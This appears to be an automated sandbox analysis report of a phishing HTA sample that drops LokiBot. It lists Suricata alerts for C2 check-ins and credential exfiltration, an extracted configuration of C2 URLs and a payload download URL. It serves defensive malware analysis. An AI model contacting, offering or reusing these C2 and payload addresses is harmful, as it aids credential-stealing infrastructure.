2024-11-15T18:14:53.594421+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49761	94.156.177.95	80	TCP
2024-11-15T18:14:54.694505+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49762	94.156.177.95	80	TCP
2024-11-15T18:14:56.897576+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49763	94.156.177.95	80	TCP
2024-11-15T18:14:58.049519+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49765	94.156.177.95	80	TCP
2024-11-15T18:14:59.161814+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49767	94.156.177.95	80	TCP
2024-11-15T18:15:00.310997+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49773	94.156.177.95	80	TCP
2024-11-15T18:15:01.433270+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49779	94.156.177.95	80	TCP
2024-11-15T18:15:02.774194+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49785	94.156.177.95	80	TCP
2024-11-15T18:15:03.942454+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49795	94.156.177.95	80	TCP
2024-11-15T18:15:05.073942+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49802	94.156.177.95	80	TCP
2024-11-15T18:15:06.199202+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49808	94.156.177.95	80	TCP
2024-11-15T18:15:07.370279+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49813	94.156.177.95	80	TCP
2024-11-15T18:15:08.480132+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49818	94.156.177.95	80	TCP
2024-11-15T18:15:09.759213+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49825	94.156.177.95	80	TCP
2024-11-15T18:15:10.869167+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49832	94.156.177.95	80	TCP
2024-11-15T18:15:12.002434+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49836	94.156.177.95	80	TCP
2024-11-15T18:15:13.104632+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49841	94.156.177.95	80	TCP
2024-11-15T18:15:14.236003+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49849	94.156.177.95	80	TCP
2024-11-15T18:15:15.349391+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49855	94.156.177.95	80	TCP
2024-11-15T18:15:16.433713+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49860	94.156.177.95	80	TCP
2024-11-15T18:15:17.538066+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49865	94.156.177.95	80	TCP
2024-11-15T18:15:18.633126+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49869	94.156.177.95	80	TCP
2024-11-15T18:15:19.765315+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49875	94.156.177.95	80	TCP
2024-11-15T18:15:20.938967+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49879	94.156.177.95	80	TCP
2024-11-15T18:15:22.075165+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49884	94.156.177.95	80	TCP
2024-11-15T18:15:23.183308+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49888	94.156.177.95	80	TCP
2024-11-15T18:15:24.806146+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49895	94.156.177.95	80	TCP
2024-11-15T18:15:26.050868+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49900	94.156.177.95	80	TCP
2024-11-15T18:15:27.207351+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49905	94.156.177.95	80	TCP
2024-11-15T18:15:28.328661+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49911	94.156.177.95	80	TCP
2024-11-15T18:15:29.444036+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49918	94.156.177.95	80	TCP
2024-11-15T18:15:30.558346+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49923	94.156.177.95	80	TCP
2024-11-15T18:15:32.185276+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49932	94.156.177.95	80	TCP
2024-11-15T18:15:33.342990+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49936	94.156.177.95	80	TCP
2024-11-15T18:15:34.461022+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49942	94.156.177.95	80	TCP
2024-11-15T18:15:35.606842+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49949	94.156.177.95	80	TCP
2024-11-15T18:15:36.942827+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49956	94.156.177.95	80	TCP
2024-11-15T18:15:38.040556+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49965	94.156.177.95	80	TCP
2024-11-15T18:15:39.160355+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49971	94.156.177.95	80	TCP
2024-11-15T18:15:40.257744+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49978	94.156.177.95	80	TCP
2024-11-15T18:15:41.402378+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49985	94.156.177.95	80	TCP
2024-11-15T18:15:42.524040+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49991	94.156.177.95	80	TCP
2024-11-15T18:15:43.648109+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	49998	94.156.177.95	80	TCP
2024-11-15T18:15:44.761342+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50003	94.156.177.95	80	TCP
2024-11-15T18:15:45.883899+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50010	94.156.177.95	80	TCP
2024-11-15T18:15:47.367955+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50016	94.156.177.95	80	TCP
2024-11-15T18:15:48.523172+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50021	94.156.177.95	80	TCP
2024-11-15T18:15:49.631500+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50026	94.156.177.95	80	TCP
2024-11-15T18:15:51.452174+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50030	94.156.177.95	80	TCP
2024-11-15T18:15:52.550655+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50039	94.156.177.95	80	TCP
2024-11-15T18:15:53.681411+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50044	94.156.177.95	80	TCP
2024-11-15T18:15:54.778594+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50049	94.156.177.95	80	TCP
2024-11-15T18:15:55.941777+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50054	94.156.177.95	80	TCP
2024-11-15T18:15:57.034588+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50063	94.156.177.95	80	TCP
2024-11-15T18:15:58.148280+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50068	94.156.177.95	80	TCP
2024-11-15T18:15:59.321996+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50073	94.156.177.95	80	TCP
2024-11-15T18:16:00.432593+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50080	94.156.177.95	80	TCP
2024-11-15T18:16:01.549900+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50084	94.156.177.95	80	TCP

ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T18:14:04.339237+0100	2858295	1	A Network Trojan was detected	192.3.243.136	80	192.168.2.4	49738	TCP

ETPRO MALWARE ReverseLoader Payload Request (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T18:14:06.302119+0100	2858795	1	A Network Trojan was detected	192.168.2.4	49730	192.3.243.136	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: 94.156.177.95/simple/five/fre.php	Avira URL Cloud: Label: malware
Source: http://94.156.177.95/simple/five/fre.php	Avira URL Cloud: Label: malware
Source: http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIF	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.95/simple/five/fre.php"]}

Multi AV Scanner detection for submitted file

Source: bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta

ReversingLabs: Detection: 21%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Phishing

Yara detected HtmlPhish44

Source: Yara match

File source: bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta, type: SAMPLE

Source: unknown

HTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.4:49731 version: TLS 1.2

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1715998634.0000000007651000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000009.00000002.1993655001.000000000716A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1992279886.0000000006CF0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbJ source: powershell.exe, 00000003.00000002.1716282823.000000000767A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: aspnet_compiler.pdb source: 31437F.exe.13.dr
Source:	Binary string: $^q7C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.pdb source: powershell.exe, 00000001.00000002.1822805726.00000000059C6000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000009.00000002.1993655001.000000000716A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1992279886.0000000006CF0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000009.00000002.1993655001.000000000716A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershell.exe, 00000009.00000002.1992279886.0000000006CF0000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 13_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

13_2_00403D74

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.4:49730 -> 192.3.243.136:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49757 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49757 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49747 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49757 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49759 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49756 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49756 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49747 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49759 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49756 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49750 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49755 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49750 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49742 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49750 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49756 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49742 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49743 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49755 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49765 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49755 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49743 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49756 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49743 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49742 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49836 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49763 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49763 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49763 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49739 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49762 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49739 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49836 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49836 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49757 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49765 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49762 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49773 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49747 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49743 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49773 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49755 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49746 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49762 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49759 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49746 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49746 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49832 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49836 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49836 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49756
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49751 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49755 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49751 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49773 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49742 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49836
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49747 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49742 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49739 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49747 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49779 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49750 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49860 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49860 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49762 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49750 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49849 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49849 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49751 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49849 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49825 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49825 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49755
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49759 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49779 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49765 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49763 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49759 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49763 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49739 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49747
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49825 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49818 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49749 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49765 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49749 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49879 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49746 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49879 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49749 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49751 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49757 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49749 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49743 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49749 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49818 -> 94.156.177.95:80
